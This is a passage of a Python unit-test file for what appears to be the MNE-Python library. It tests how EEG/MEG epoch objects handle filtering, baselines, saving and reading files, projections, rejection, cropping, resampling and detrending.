assert_raises(RuntimeError, epochs.savgol_filter, 10.)
epochs = Epochs(raw, events, event_id, tmin, tmax, preload=True)
freqs = fftpack.fftfreq(len(epochs.times), 1. / epochs.info['sfreq'])
data = np.abs(fftpack.fft(epochs.get_data()))
match_mask = np.logical_and(freqs >= 0, freqs <= h_freq / 2.)
mismatch_mask = np.logical_and(freqs >= h_freq * 2, freqs < 50.)
epochs.savgol_filter(h_freq)
data_filt = np.abs(fftpack.fft(epochs.get_data()))
# decent in pass-band
assert_allclose(np.mean(data[:, :, match_mask], 0),
np.mean(data_filt[:, :, match_mask], 0),
rtol=1e-4, atol=1e-2)
# suppression in stop-band
assert_true(np.mean(data[:, :, mismatch_mask]) >
np.mean(data_filt[:, :, mismatch_mask]) * 5)
def test_epochs_hash():
"""Test epoch hashing."""
raw, events = _get_data()[:2]
epochs = Epochs(raw, events, event_id, tmin, tmax)
assert_raises(RuntimeError, epochs.__hash__)
epochs = Epochs(raw, events, event_id, tmin, tmax, preload=True)
assert_equal(hash(epochs), hash(epochs))
epochs_2 = Epochs(raw, events, event_id, tmin, tmax, preload=True)
assert_equal(hash(epochs), hash(epochs_2))
# do NOT use assert_equal here, failing output is terrible
assert_true(pickle.dumps(epochs) == pickle.dumps(epochs_2))
epochs_2._data[0, 0, 0] -= 1
assert_not_equal(hash(epochs), hash(epochs_2))
def test_event_ordering():
"""Test event order."""
raw, events = _get_data()[:2]
events2 = events.copy()
rng.shuffle(events2)
for ii, eve in enumerate([events, events2]):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
Epochs(raw, eve, event_id, tmin, tmax,
reject=reject, flat=flat)
assert_equal(len(w), ii)
if ii > 0:
assert_true('chronologically' in '%s' % w[-1].message)
# Duplicate events should be an error...
events2 = events[[0, 0]]
events2[:, 2] = [1, 2]
assert_raises(RuntimeError, Epochs, raw, events2, event_id=None)
# But only if duplicates are actually used by event_id
assert_equal(len(Epochs(raw, events2, event_id=dict(a=1), preload=True)),
1)
def test_epochs_bad_baseline():
"""Test Epochs initialization with bad baseline parameters."""
raw, events = _get_data()[:2]
assert_raises(ValueError, Epochs, raw, events, None, -0.1, 0.3, (-0.2, 0))
assert_raises(ValueError, Epochs, raw, events, None, -0.1, 0.3, (0, 0.4))
assert_raises(ValueError, Epochs, raw, events, None, -0.1, 0.3, (0.1, 0))
assert_raises(ValueError, Epochs, raw, events, None, 0.1, 0.3, (None, 0))
assert_raises(ValueError, Epochs, raw, events, None, -0.3, -0.1, (0, None))
epochs = Epochs(raw, events, None, 0.1, 0.3, baseline=None)
assert_raises(RuntimeError, epochs.apply_baseline, (0.1, 0.2))
epochs.load_data()
assert_raises(ValueError, epochs.apply_baseline, (None, 0))
assert_raises(ValueError, epochs.apply_baseline, (0, None))
# put some rescale options here, too
data = np.arange(100, dtype=float)
assert_raises(ValueError, rescale, data, times=data, baseline=(-2, -1))
rescale(data.copy(), times=data, baseline=(2, 2)) # ok
assert_raises(ValueError, rescale, data, times=data, baseline=(2, 1))
assert_raises(ValueError, rescale, data, times=data, baseline=(100, 101))
def test_epoch_combine_ids():
"""Test combining event ids in epochs compared to events."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events, {'a': 1, 'b': 2, 'c': 3,
'd': 4, 'e': 5, 'f': 32},
tmin, tmax, picks=picks, preload=False)
events_new = merge_events(events, [1, 2], 12)
epochs_new = combine_event_ids(epochs, ['a', 'b'], {'ab': 12})
assert_equal(epochs_new['ab']._name, 'ab')
assert_array_equal(events_new, epochs_new.events)
# should probably add test + functionality for non-replacement XXX
def test_epoch_multi_ids():
"""Test epoch selection via multiple/partial keys."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events, {'a/b/a': 1, 'a/b/b': 2, 'a/c': 3,
'b/d': 4, 'a_b': 5},
tmin, tmax, picks=picks, preload=False)
epochs_regular = epochs['a/b']
epochs_reverse = epochs['b/a']
epochs_multi = epochs[['a/b/a', 'a/b/b']]
assert_array_equal(epochs_multi.events, epochs_regular.events)
assert_array_equal(epochs_reverse.events, epochs_regular.events)
assert_allclose(epochs_multi.get_data(), epochs_regular.get_data())
assert_allclose(epochs_reverse.get_data(), epochs_regular.get_data())
def test_read_epochs_bad_events():
"""Test epochs when events are at the beginning or the end of the file."""
raw, events, picks = _get_data()
# Event at the beginning
epochs = Epochs(raw, np.array([[raw.first_samp, 0, event_id]]),
event_id, tmin, tmax, picks=picks)
with warnings.catch_warnings(record=True):
evoked = epochs.average()
epochs = Epochs(raw, np.array([[raw.first_samp, 0, event_id]]),
event_id, tmin, tmax, picks=picks)
assert_true(repr(epochs)) # test repr
epochs.drop_bad()
assert_true(repr(epochs))
with warnings.catch_warnings(record=True):
evoked = epochs.average()
# Event at the end
epochs = Epochs(raw, np.array([[raw.last_samp, 0, event_id]]),
event_id, tmin, tmax, picks=picks)
with warnings.catch_warnings(record=True):
evoked = epochs.average()
assert evoked
warnings.resetwarnings()
@slow_test
def test_read_write_epochs():
"""Test epochs from raw files with IO as fif file."""
raw, events, picks = _get_data(preload=True)
tempdir = _TempDir()
temp_fname = op.join(tempdir, 'test-epo.fif')
temp_fname_no_bl = op.join(tempdir, 'test_no_bl-epo.fif')
baseline = (None, 0)
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=baseline, preload=True)
epochs_orig = epochs.copy()
epochs_no_bl = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=None, preload=True)
assert_true(epochs_no_bl.baseline is None)
evoked = epochs.average()
data = epochs.get_data()
# Bad tmin/tmax parameters
assert_raises(ValueError, Epochs, raw, events, event_id, tmax, tmin,
baseline=None)
epochs_no_id = Epochs(raw, pick_events(events, include=event_id),
None, tmin, tmax, picks=picks)
assert_array_equal(data, epochs_no_id.get_data())
eog_picks = pick_types(raw.info, meg=False, eeg=False, stim=False,
eog=True, exclude='bads')
eog_ch_names = [raw.ch_names[k] for k in eog_picks]
epochs.drop_channels(eog_ch_names)
assert_true(len(epochs.info['chs']) == len(epochs.ch_names) ==
epochs.get_data().shape[1])
data_no_eog = epochs.get_data()
assert_true(data.shape[1] == (data_no_eog.shape[1] + len(eog_picks)))
# test decim kwarg
with warnings.catch_warnings(record=True) as w:
# decim with lowpass
warnings.simplefilter('always')
epochs_dec = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
decim=2)
assert_equal(len(w), 1)
# decim without lowpass
epochs_dec.info['lowpass'] = None
epochs_dec.decimate(2)
assert_equal(len(w), 2)
data_dec = epochs_dec.get_data()
assert_allclose(data[:, :, epochs_dec._decim_slice], data_dec, rtol=1e-7,
atol=1e-12)
evoked_dec = epochs_dec.average()
assert_allclose(evoked.data[:, epochs_dec._decim_slice],
evoked_dec.data, rtol=1e-12, atol=1e-17)
n = evoked.data.shape[1]
n_dec = evoked_dec.data.shape[1]
n_dec_min = n // 4
assert_true(n_dec_min <= n_dec <= n_dec_min + 1)
assert_true(evoked_dec.info['sfreq'] == evoked.info['sfreq'] / 4)
# Test event access on non-preloaded data (#2345)
# due to reapplication of the proj matrix, this is our quality limit
# for some tests
tols = dict(atol=1e-3, rtol=1e-20)
raw, events, picks = _get_data()
events[::2, 1] = 1
events[1::2, 2] = 2
event_ids = dict(a=1, b=2)
for proj in (True, 'delayed', False):
epochs = Epochs(raw, events, event_ids, tmin, tmax, picks=picks,
proj=proj, reject=reject)
assert_equal(epochs.proj, proj if proj != 'delayed' else False)
data1 = epochs.get_data()
epochs2 = epochs.copy().apply_proj()
assert_equal(epochs2.proj, True)
data2 = epochs2.get_data()
assert_allclose(data1, data2, **tols)
epochs.save(temp_fname)
epochs_read = read_epochs(temp_fname, preload=False)
assert_allclose(epochs.get_data(), epochs_read.get_data(), **tols)
assert_allclose(epochs['a'].get_data(),
epochs_read['a'].get_data(), **tols)
assert_allclose(epochs['b'].get_data(),
epochs_read['b'].get_data(), **tols)
# ensure we don't leak file descriptors
epochs_read = read_epochs(temp_fname, preload=False)
epochs_copy = epochs_read.copy()
del epochs_read
epochs_copy.get_data()
with warnings.catch_warnings(record=True) as w:
del epochs_copy
assert_equal(len(w), 0)
# test IO
for preload in (False, True):
epochs = epochs_orig.copy()
epochs.save(temp_fname)
epochs_no_bl.save(temp_fname_no_bl)
epochs_read = read_epochs(temp_fname, preload=preload)
epochs_no_bl.save(temp_fname_no_bl)
epochs_read = read_epochs(temp_fname)
epochs_no_bl_read = read_epochs(temp_fname_no_bl)
assert_raises(ValueError, epochs.apply_baseline, baseline=[1, 2, 3])
epochs_with_bl = epochs_no_bl_read.copy().apply_baseline(baseline)
assert_true(isinstance(epochs_with_bl, BaseEpochs))
assert_true(epochs_with_bl.baseline == baseline)
assert_true(epochs_no_bl_read.baseline != baseline)
assert_true(str(epochs_read).startswith('<Epochs'))
epochs_no_bl_read.apply_baseline(baseline)
assert_array_equal(epochs_no_bl_read.times, epochs.times)
assert_array_almost_equal(epochs_read.get_data(), epochs.get_data())
assert_array_almost_equal(epochs.get_data(),
epochs_no_bl_read.get_data())
assert_array_equal(epochs_read.times, epochs.times)
assert_array_almost_equal(epochs_read.average().data, evoked.data)
assert_equal(epochs_read.proj, epochs.proj)
bmin, bmax = epochs.baseline
if bmin is None:
bmin = epochs.times[0]
if bmax is None:
bmax = epochs.times[-1]
baseline = (bmin, bmax)
assert_array_almost_equal(epochs_read.baseline, baseline)
assert_array_almost_equal(epochs_read.tmin, epochs.tmin, 2)
assert_array_almost_equal(epochs_read.tmax, epochs.tmax, 2)
assert_equal(epochs_read.event_id, epochs.event_id)
epochs.event_id.pop('1')
epochs.event_id.update({'a:a': 1}) # test allow for ':' in key
epochs.save(op.join(tempdir, 'foo-epo.fif'))
epochs_read2 = read_epochs(op.join(tempdir, 'foo-epo.fif'),
preload=preload)
assert_equal(epochs_read2.event_id, epochs.event_id)
assert_equal(epochs_read2['a:a'].average().comment, 'a:a')
# add reject here so some of the epochs get dropped
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
reject=reject)
epochs.save(temp_fname)
# ensure bad events are not saved
epochs_read3 = read_epochs(temp_fname, preload=preload)
assert_array_equal(epochs_read3.events, epochs.events)
data = epochs.get_data()
assert_true(epochs_read3.events.shape[0] == data.shape[0])
# test copying loaded one (raw property)
epochs_read4 = epochs_read3.copy()
assert_array_almost_equal(epochs_read4.get_data(), data)
# test equalizing loaded one (drop_log property)
epochs_read4.equalize_event_counts(epochs.event_id)
epochs.drop([1, 2], reason='can we recover orig ID?')
epochs.save(temp_fname)
epochs_read5 = read_epochs(temp_fname, preload=preload)
assert_array_equal(epochs_read5.selection, epochs.selection)
assert_equal(len(epochs_read5.selection), len(epochs_read5.events))
assert_array_equal(epochs_read5.drop_log, epochs.drop_log)
if preload:
# Test that one can drop channels on read file
epochs_read5.drop_channels(epochs_read5.ch_names[:1])
# test warnings on bad filenames
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
epochs_badname = op.join(tempdir, 'test-bad-name.fif.gz')
epochs.save(epochs_badname)
read_epochs(epochs_badname, preload=preload)
assert_naming(w, 'test_epochs.py', 2)
# test loading epochs with missing events
epochs = Epochs(raw, events, dict(foo=1, bar=999), tmin, tmax,
picks=picks, on_missing='ignore')
epochs.save(temp_fname)
epochs_read = read_epochs(temp_fname, preload=preload)
assert_allclose(epochs.get_data(), epochs_read.get_data(), **tols)
assert_array_equal(epochs.events, epochs_read.events)
assert_equal(set(epochs.event_id.keys()),
set(text_type(x) for x in epochs_read.event_id.keys()))
# test saving split epoch files
epochs.save(temp_fname, split_size='7MB')
epochs_read = read_epochs(temp_fname, preload=preload)
assert_allclose(epochs.get_data(), epochs_read.get_data(), **tols)
assert_array_equal(epochs.events, epochs_read.events)
assert_array_equal(epochs.selection, epochs_read.selection)
assert_equal(epochs.drop_log, epochs_read.drop_log)
# Test that having a single time point works
epochs.load_data().crop(0, 0)
assert_equal(len(epochs.times), 1)
assert_equal(epochs.get_data().shape[-1], 1)
epochs.save(temp_fname)
epochs_read = read_epochs(temp_fname, preload=preload)
assert_equal(len(epochs_read.times), 1)
assert_equal(epochs.get_data().shape[-1], 1)
def test_epochs_proj():
"""Test handling projection (apply proj in Raw or in Epochs)."""
tempdir = _TempDir()
raw, events, picks = _get_data()
exclude = raw.info['bads'] + ['MEG 2443', 'EEG 053'] # bads + 2 more
this_picks = pick_types(raw.info, meg=True, eeg=False, stim=True,
eog=True, exclude=exclude)
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=this_picks,
proj=True)
assert_true(all(p['active'] is True for p in epochs.info['projs']))
evoked = epochs.average()
assert_true(all(p['active'] is True for p in evoked.info['projs']))
data = epochs.get_data()
raw_proj = read_raw_fif(raw_fname).apply_proj()
epochs_no_proj = Epochs(raw_proj, events[:4], event_id, tmin, tmax,
picks=this_picks, proj=False)
data_no_proj = epochs_no_proj.get_data()
assert_true(all(p['active'] is True for p in epochs_no_proj.info['projs']))
evoked_no_proj = epochs_no_proj.average()
assert_true(all(p['active'] is True for p in evoked_no_proj.info['projs']))
assert_true(epochs_no_proj.proj is True) # as projs are active from Raw
assert_array_almost_equal(data, data_no_proj, decimal=8)
# make sure we can exclude avg ref
this_picks = pick_types(raw.info, meg=True, eeg=True, stim=True,
eog=True, exclude=exclude)
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=this_picks,
proj=True)
epochs.set_eeg_reference().apply_proj()
assert_true(_has_eeg_average_ref_proj(epochs.info['projs']))
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=this_picks,
proj=True)
assert_true(not _has_eeg_average_ref_proj(epochs.info['projs']))
# make sure we don't add avg ref when a custom ref has been applied
raw.info['custom_ref_applied'] = True
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=this_picks,
proj=True)
assert_true(not _has_eeg_average_ref_proj(epochs.info['projs']))
# From GH#2200:
# This has no problem
proj = raw.info['projs']
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=this_picks,
proj=False)
epochs.info['projs'] = []
data = epochs.copy().add_proj(proj).apply_proj().get_data()
# save and reload data
fname_epo = op.join(tempdir, 'temp-epo.fif')
epochs.save(fname_epo) # Save without proj added
epochs_read = read_epochs(fname_epo)
epochs_read.add_proj(proj)
epochs_read.apply_proj() # This used to bomb
data_2 = epochs_read.get_data() # Let's check the result
assert_allclose(data, data_2, atol=1e-15, rtol=1e-3)
# adding EEG ref (GH #2727)
raw = read_raw_fif(raw_fname)
raw.add_proj([], remove_existing=True)
raw.info['bads'] = ['MEG 2443', 'EEG 053']
picks = pick_types(raw.info, meg=False, eeg=True, stim=True, eog=False,
exclude='bads')
epochs = Epochs(raw, events, event_id, tmin, tmax, proj=True, picks=picks,
preload=True)
epochs.pick_channels(['EEG 001', 'EEG 002'])
assert_equal(len(epochs), 7) # sufficient for testing
temp_fname = op.join(tempdir, 'test-epo.fif')
epochs.save(temp_fname)
for preload in (True, False):
epochs = read_epochs(temp_fname, proj=False, preload=preload)
epochs.set_eeg_reference().apply_proj()
assert_allclose(epochs.get_data().mean(axis=1), 0, atol=1e-15)
epochs = read_epochs(temp_fname, proj=False, preload=preload)
epochs.set_eeg_reference()
assert_raises(AssertionError, assert_allclose,
epochs.get_data().mean(axis=1), 0., atol=1e-15)
epochs.apply_proj()
assert_allclose(epochs.get_data().mean(axis=1), 0, atol=1e-15)
def test_evoked_arithmetic():
"""Test arithmetic of evoked data."""
raw, events, picks = _get_data()
epochs1 = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks)
evoked1 = epochs1.average()
epochs2 = Epochs(raw, events[4:8], event_id, tmin, tmax, picks=picks)
evoked2 = epochs2.average()
epochs = Epochs(raw, events[:8], event_id, tmin, tmax, picks=picks)
evoked = epochs.average()
evoked_sum = combine_evoked([evoked1, evoked2], weights='nave')
assert_array_equal(evoked.data, evoked_sum.data)
assert_array_equal(evoked.times, evoked_sum.times)
assert_equal(evoked_sum.nave, evoked1.nave + evoked2.nave)
evoked_diff = combine_evoked([evoked1, evoked1], weights=[1, -1])
assert_array_equal(np.zeros_like(evoked.data), evoked_diff.data)
def test_evoked_io_from_epochs():
"""Test IO of evoked data made from epochs."""
tempdir = _TempDir()
raw, events, picks = _get_data()
# offset our tmin so we don't get exactly a zero value when decimating
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
epochs = Epochs(raw, events[:4], event_id, tmin + 0.011, tmax,
picks=picks, decim=5)
assert_true(len(w) == 1)
evoked = epochs.average()
evoked.info['proj_name'] = '' # Test that empty string shortcuts to None.
evoked.save(op.join(tempdir, 'evoked-ave.fif'))
evoked2 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'))[0]
assert_equal(evoked2.info['proj_name'], None)
assert_allclose(evoked.data, evoked2.data, rtol=1e-4, atol=1e-20)
assert_allclose(evoked.times, evoked2.times, rtol=1e-4,
atol=1 / evoked.info['sfreq'])
# now let's do one with negative time
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
epochs = Epochs(raw, events[:4], event_id, 0.1, tmax,
picks=picks, baseline=(0.1, 0.2), decim=5)
evoked = epochs.average()
evoked.save(op.join(tempdir, 'evoked-ave.fif'))
evoked2 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'))[0]
assert_allclose(evoked.data, evoked2.data, rtol=1e-4, atol=1e-20)
assert_allclose(evoked.times, evoked2.times, rtol=1e-4, atol=1e-20)
# should be equivalent to a cropped original
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
epochs = Epochs(raw, events[:4], event_id, -0.2, tmax,
picks=picks, baseline=(0.1, 0.2), decim=5)
evoked = epochs.average()
evoked.crop(0.099, None)
assert_allclose(evoked.data, evoked2.data, rtol=1e-4, atol=1e-20)
assert_allclose(evoked.times, evoked2.times, rtol=1e-4, atol=1e-20)
def test_evoked_standard_error():
"""Test calculation and read/write of standard error."""
raw, events, picks = _get_data()
tempdir = _TempDir()
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks)
evoked = [epochs.average(), epochs.standard_error()]
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), evoked)
evoked2 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), [0, 1])
evoked3 = [read_evokeds(op.join(tempdir, 'evoked-ave.fif'), '1'),
read_evokeds(op.join(tempdir, 'evoked-ave.fif'), '1',
kind='standard_error')]
for evoked_new in [evoked2, evoked3]:
assert_true(evoked_new[0]._aspect_kind ==
FIFF.FIFFV_ASPECT_AVERAGE)
assert_true(evoked_new[0].kind == 'average')
assert_true(evoked_new[1]._aspect_kind ==
FIFF.FIFFV_ASPECT_STD_ERR)
assert_true(evoked_new[1].kind == 'standard_error')
for ave, ave2 in zip(evoked, evoked_new):
assert_array_almost_equal(ave.data, ave2.data)
assert_array_almost_equal(ave.times, ave2.times)
assert_equal(ave.nave, ave2.nave)
assert_equal(ave._aspect_kind, ave2._aspect_kind)
assert_equal(ave.kind, ave2.kind)
assert_equal(ave.last, ave2.last)
assert_equal(ave.first, ave2.first)
def test_reject_epochs():
"""Test of epochs rejection."""
raw, events, picks = _get_data()
events1 = events[events[:, 2] == event_id]
epochs = Epochs(raw, events1, event_id, tmin, tmax,
reject=reject, flat=flat)
assert_raises(RuntimeError, len, epochs)
n_events = len(epochs.events)
data = epochs.get_data()
n_clean_epochs = len(data)
# Should match
# mne_process_raw --raw test_raw.fif --projoff \
# --saveavetag -ave --ave test.ave --filteroff
assert_true(n_events > n_clean_epochs)
assert_true(n_clean_epochs == 3)
assert_true(epochs.drop_log == [[], [], [], ['MEG 2443'], ['MEG 2443'],
['MEG 2443'], ['MEG 2443']])
# Ensure epochs are not dropped based on a bad channel
raw_2 = raw.copy()
raw_2.info['bads'] = ['MEG 2443']
reject_crazy = dict(grad=1000e-15, mag=4e-15, eeg=80e-9, eog=150e-9)
epochs = Epochs(raw_2, events1, event_id, tmin, tmax,
reject=reject_crazy, flat=flat)
epochs.drop_bad()
assert_true(all('MEG 2442' in e for e in epochs.drop_log))
assert_true(all('MEG 2443' not in e for e in epochs.drop_log))
# Invalid reject_tmin/reject_tmax/detrend
assert_raises(ValueError, Epochs, raw, events1, event_id, tmin, tmax,
reject_tmin=1., reject_tmax=0)
assert_raises(ValueError, Epochs, raw, events1, event_id, tmin, tmax,
reject_tmin=tmin - 1, reject_tmax=1.)
assert_raises(ValueError, Epochs, raw, events1, event_id, tmin, tmax,
reject_tmin=0., reject_tmax=tmax + 1)
epochs = Epochs(raw, events1, event_id, tmin, tmax, picks=picks,
reject=reject, flat=flat, reject_tmin=0., reject_tmax=.1)
data = epochs.get_data()
n_clean_epochs = len(data)
assert_true(n_clean_epochs == 7)
assert_true(len(epochs) == 7)
assert_true(epochs.times[epochs._reject_time][0] >= 0.)
assert_true(epochs.times[epochs._reject_time][-1] <= 0.1)
# Invalid data for _is_good_epoch function
epochs = Epochs(raw, events1, event_id, tmin, tmax)
assert_equal(epochs._is_good_epoch(None), (False, ['NO_DATA']))
assert_equal(epochs._is_good_epoch(np.zeros((1, 1))),
(False, ['TOO_SHORT']))
data = epochs[0].get_data()[0]
assert_equal(epochs._is_good_epoch(data), (True, None))
def test_preload_epochs():
"""Test preload of epochs."""
raw, events, picks = _get_data()
epochs_preload = Epochs(raw, events[:16], event_id, tmin, tmax,
picks=picks, preload=True,
reject=reject, flat=flat)
data_preload = epochs_preload.get_data()
epochs = Epochs(raw, events[:16], event_id, tmin, tmax, picks=picks,
preload=False, reject=reject, flat=flat)
data = epochs.get_data()
assert_array_equal(data_preload, data)
assert_array_almost_equal(epochs_preload.average().data,
epochs.average().data, 18)
def test_indexing_slicing():
"""Test of indexing and slicing operations."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:20], event_id, tmin, tmax, picks=picks,
reject=reject, flat=flat)
data_normal = epochs.get_data()
n_good_events = data_normal.shape[0]
# indices for slicing
start_index = 1
end_index = n_good_events - 1
assert((end_index - start_index) > 0)
for preload in [True, False]:
epochs2 = Epochs(raw, events[:20], event_id, tmin, tmax, picks=picks,
preload=preload, reject=reject, flat=flat)
if not preload:
epochs2.drop_bad()
# using slicing
epochs2_sliced = epochs2[start_index:end_index]
data_epochs2_sliced = epochs2_sliced.get_data()
assert_array_equal(data_epochs2_sliced,
data_normal[start_index:end_index])
# using indexing
pos = 0
for idx in range(start_index, end_index):
data = epochs2_sliced[pos].get_data()
assert_array_equal(data[0], data_normal[idx])
pos += 1
# using indexing with an int
data = epochs2[data_epochs2_sliced.shape[0]].get_data()
assert_array_equal(data, data_normal[[idx]])
# using indexing with an array
idx = rng.randint(0, data_epochs2_sliced.shape[0], 10)
data = epochs2[idx].get_data()
assert_array_equal(data, data_normal[idx])
# using indexing with a list of indices
idx = [0]
data = epochs2[idx].get_data()
assert_array_equal(data, data_normal[idx])
idx = [0, 1]
data = epochs2[idx].get_data()
assert_array_equal(data, data_normal[idx])
def test_comparision_with_c():
"""Test of average obtained vs C code."""
raw, events = _get_data()[:2]
c_evoked = read_evokeds(evoked_nf_name, condition=0)
epochs = Epochs(raw, events, event_id, tmin, tmax, baseline=None,
preload=True, proj=False)
evoked = epochs.set_eeg_reference().apply_proj().average()
sel = pick_channels(c_evoked.ch_names, evoked.ch_names)
evoked_data = evoked.data
c_evoked_data = c_evoked.data[sel]
assert_true(evoked.nave == c_evoked.nave)
assert_array_almost_equal(evoked_data, c_evoked_data, 10)
assert_array_almost_equal(evoked.times, c_evoked.times, 12)
def test_crop():
"""Test of crop of epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:5], event_id, tmin, tmax, picks=picks,
preload=False, reject=reject, flat=flat)
assert_raises(RuntimeError, epochs.crop, None, 0.2) # not preloaded
data_normal = epochs.get_data()
epochs2 = Epochs(raw, events[:5], event_id, tmin, tmax,
picks=picks, preload=True, reject=reject, flat=flat)
with warnings.catch_warnings(record=True) as w:
epochs2.crop(-20, 200)
assert_true(len(w) == 2)
# indices for slicing
tmin_window = tmin + 0.1
tmax_window = tmax - 0.1
tmask = (epochs.times >= tmin_window) & (epochs.times <= tmax_window)
assert_true(tmin_window > tmin)
assert_true(tmax_window < tmax)
epochs3 = epochs2.copy().crop(tmin_window, tmax_window)
data3 = epochs3.get_data()
epochs2.crop(tmin_window, tmax_window)
data2 = epochs2.get_data()
assert_array_equal(data2, data_normal[:, :, tmask])
assert_array_equal(data3, data_normal[:, :, tmask])
assert_array_equal(epochs.time_as_index([tmin, tmax], use_rounding=True),
[0, len(epochs.times) - 1])
assert_array_equal(epochs3.time_as_index([tmin_window, tmax_window],
use_rounding=True),
[0, len(epochs3.times) - 1])
# test time info is correct
epochs = EpochsArray(np.zeros((1, 1, 1000)), create_info(1, 1000., 'eeg'),
np.ones((1, 3), int), tmin=-0.2)
epochs.crop(-.200, .700)
last_time = epochs.times[-1]
with warnings.catch_warnings(record=True): # not LP filtered
epochs.decimate(10)
assert_allclose(last_time, epochs.times[-1])
epochs = Epochs(raw, events[:5], event_id, -1, 1,
picks=picks, preload=True, reject=reject, flat=flat)
# We include nearest sample, so actually a bit beyound our bounds here
assert_allclose(epochs.tmin, -1.0006410259015925, rtol=1e-12)
assert_allclose(epochs.tmax, 1.0006410259015925, rtol=1e-12)
epochs_crop = epochs.copy().crop(-1, 1)
assert_allclose(epochs.times, epochs_crop.times, rtol=1e-12)
# Ensure we don't allow silly crops
with warnings.catch_warnings(record=True): # tmin/tmax out of bounds
assert_raises(ValueError, epochs.crop, 1000, 2000)
assert_raises(ValueError, epochs.crop, 0.1, 0)
def test_resample():
"""Test of resample of epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks,
preload=False, reject=reject, flat=flat)
assert_raises(RuntimeError, epochs.resample, 100)
epochs_o = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks,
preload=True, reject=reject, flat=flat)
epochs = epochs_o.copy()
data_normal = cp.deepcopy(epochs.get_data())
times_normal = cp.deepcopy(epochs.times)
sfreq_normal = epochs.info['sfreq']
# upsample by 2
epochs = epochs_o.copy()
epochs.resample(sfreq_normal * 2, npad=0)
data_up = cp.deepcopy(epochs.get_data())
times_up = cp.deepcopy(epochs.times)
sfreq_up = epochs.info['sfreq']
# downsamply by 2, which should match
epochs.resample(sfreq_normal, npad=0)
data_new = cp.deepcopy(epochs.get_data())
times_new = cp.deepcopy(epochs.times)
sfreq_new = epochs.info['sfreq']
assert_true(data_up.shape[2] == 2 * data_normal.shape[2])
assert_true(sfreq_up == 2 * sfreq_normal)
assert_true(sfreq_new == sfreq_normal)
assert_true(len(times_up) == 2 * len(times_normal))
assert_array_almost_equal(times_new, times_normal, 10)
assert_true(data_up.shape[2] == 2 * data_normal.shape[2])
assert_array_almost_equal(data_new, data_normal, 5)
# use parallel
epochs = epochs_o.copy()
epochs.resample(sfreq_normal * 2, n_jobs=2, npad=0)
assert_true(np.allclose(data_up, epochs._data, rtol=1e-8, atol=1e-16))
# test copy flag
epochs = epochs_o.copy()
epochs_resampled = epochs.copy().resample(sfreq_normal * 2, npad=0)
assert_true(epochs_resampled is not epochs)
epochs_resampled = epochs.resample(sfreq_normal * 2, npad=0)
assert_true(epochs_resampled is epochs)
# test proper setting of times (#2645)
n_trial, n_chan, n_time, sfreq = 1, 1, 10, 1000.
data = np.zeros((n_trial, n_chan, n_time))
events = np.zeros((n_trial, 3), int)
info = create_info(n_chan, sfreq, 'eeg')
epochs1 = EpochsArray(data, deepcopy(info), events)
epochs2 = EpochsArray(data, deepcopy(info), events)
epochs = concatenate_epochs([epochs1, epochs2])
epochs1.resample(epochs1.info['sfreq'] // 2, npad='auto')
epochs2.resample(epochs2.info['sfreq'] // 2, npad='auto')
epochs = concatenate_epochs([epochs1, epochs2])
for e in epochs1, epochs2, epochs:
assert_equal(e.times[0], epochs.tmin)
assert_equal(e.times[-1], epochs.tmax)
# test that cropping after resampling works (#3296)
this_tmin = -0.002
epochs = EpochsArray(data, deepcopy(info), events, tmin=this_tmin)
for times in (epochs.times, epochs._raw_times):
assert_allclose(times, np.arange(n_time) / sfreq + this_tmin)
epochs.resample(info['sfreq'] * 2.)
for times in (epochs.times, epochs._raw_times):
assert_allclose(times, np.arange(2 * n_time) / (sfreq * 2) + this_tmin)
epochs.crop(0, None)
for times in (epochs.times, epochs._raw_times):
assert_allclose(times, np.arange((n_time - 2) * 2) / (sfreq * 2))
epochs.resample(sfreq)
for times in (epochs.times, epochs._raw_times):
assert_allclose(times, np.arange(n_time - 2) / sfreq)
def test_detrend():
"""Test detrending of epochs."""
raw, events, picks = _get_data()
# test first-order
epochs_1 = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=None, detrend=1)
epochs_2 = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=None, detrend=None)
data_picks = pick_types(epochs_1.info, meg=True, eeg=True,
exclude='bads')
evoked_1 = epochs_1.average()
evoked_2 = epochs_2.average()
evoked_2.detrend(1)
# Due to roundoff these won't be exactly equal, but they should be close
assert_true(np.allclose(evoked_1.data, evoked_2.data,
rtol=1e-8, atol=1e-20))
# test zeroth-order case
for preload in [True, False]:
epochs_1 = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=(None, None), preload=preload)
epochs_2 = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=None, preload=preload, detrend=0)
a = epochs_1.get_data()
b = epochs_2.get_data()
# All data channels should be almost equal
assert_true(np.allclose(a[:, data_picks, :], b[:, data_picks, :],
rtol=1e-16, atol=1e-20))
# There are non-M/EEG channels that should not be equal:
assert_true(not np.allclose(a, b))
for value in ['foo', 2, False, True]:
assert_raises(ValueError, Epochs, raw, events[:4], event_id,
tmin, tmax, detrend=value)
def test_bootstrap():
"""Test of bootstrapping of epochs."""
